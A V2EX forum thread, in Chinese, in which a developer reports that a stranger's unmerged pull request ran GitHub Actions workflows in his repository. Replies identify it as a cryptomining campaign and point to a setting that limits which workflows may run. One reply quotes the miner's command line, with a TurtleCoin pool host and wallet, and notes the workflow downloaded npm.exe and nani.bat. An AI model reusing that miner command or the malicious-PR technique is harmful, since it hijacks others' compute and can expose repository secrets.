关于 github 中的 workflow 可以随便执行的问题

2021-04-12 10:33:11 +08:00

Drinker

这两天发生的，之前申请了个 360 E5 的账号，用 github 的 workflow 跑 API 来续期，然后这两天发现有个家伙提了个 pr，就是此人 https://github.com/laksjduetryuism，然后再 actions 里面看看到对方提的 pr 可以直接再工作流里面执行， https://imgur.com/xyv9435, pr 我还没有合并， https://imgur.com/bAV9nqm，就直接生效了？如果这样可以执行不是就可以获取我再项目里面设置的 id 和 secret ... 害怕。。。

2403 次点击

所在节点

GitHub

29 条回复

mangoDB

2021-04-12 13:38:21 +08:00

楼主请看这个帖子。

[黑客用 GitHub 服务器挖矿，三天跑了 3 万个任务，代码惊现中文]( https://zhuanlan.zhihu.com/p/363729726 )

laoyur

2021-04-12 13:42:49 +08:00

哈哈，挖矿挖到楼主头上了，笑出声

Drinker

2021-04-12 13:48:29 +08:00

@hzcer OK，我去瞅瞅。

Drinker

2021-04-12 13:48:54 +08:00

@Trim21 那就好，谢谢。

Drinker

2021-04-12 13:49:58 +08:00

@mangoDB 就是这个....
npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo
yml 文件里面就是下载 npm.exe 和 nani.bat 。

Drinker

2021-04-12 13:50:58 +08:00

@laoyur 第一次遇到这种，应该就是上面说的挖矿了。

patrickyoung

2021-04-12 16:29:08 +08:00

这个 bug 已经有人在 src 交了，现在是有设置的，自己去设置里设只允许本地就行

Drinker

2021-04-12 19:19:48 +08:00

@patrickyoung 谢谢，已经给官方处理了。

raaaaaar

2021-04-13 07:40:03 +08:00

自由就是被这群人加了限制。。

第 2 页／共 2 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/769998

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.